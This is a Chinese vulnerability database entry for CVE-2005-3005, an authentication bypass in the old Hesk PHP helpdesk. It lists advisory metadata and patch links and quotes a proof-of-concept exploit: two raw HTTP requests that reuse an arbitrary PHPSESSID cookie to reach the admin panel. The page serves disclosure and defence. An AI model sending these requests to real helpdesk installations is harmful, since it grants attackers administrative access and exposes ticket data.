Hesk会话绕过身份验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109092 漏洞类型 访问验证错误
发布时间 2005-09-20 更新时间 2006-01-19
CVE编号 CVE-2005-3005 CNNVD-ID CNNVD-200509-215
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/26285
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-215
|漏洞详情
Hesk是一套免费的PHP帮助台软件。该软件支持为网站建立一个基于Web的票务支持系统(服务台),并通过Web界面来管理客户请求。HelpdeskSoftwareHesk中,远程攻击者可以修改PHPSESSID会话ID参数或cookie,从而绕过(1)admin.php和(2)admin_main.php模块的身份验证。
|漏洞EXP
source: http://www.securityfocus.com/bid/14879/info

Hesk is prone to an authentication bypass vulnerability.

Successful exploitation will grant an attacker administrative access to the application. This can lead to unauthorized access of sensitive data, modification of helpdesk data and program code, and other types of attacks. 

1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.example.com/hesk/admin.php
Cookie: PHPSESSID=12345 <!-- Random Session ID--!>
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
user=1&pass=sdfd&a=do_login");

2. GET request to administrative control panel:
GET admin_main.php +
("Host: www.example.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7)
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Cookie: PHPSESSID=12345") <!-- Session ID --!>
|参考资料

来源:BID
名称:14879
链接:http://www.securityfocus.com/bid/14879
来源:www.phpjunkyard.com
链接:http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
来源:VUPEN
名称:ADV-2005-1792
链接:http://www.frsirt.com/english/advisories/2005/1792
来源:SECUNIA
名称:16859
链接:http://secunia.com/advisories/16859
来源:BUGTRAQ
名称:20050920HeskSessionIDValidationVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112724743530521&w=2
来源:BUGTRAQ
名称:20050920HeskSessionIDValidationVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=112724743530521&w=2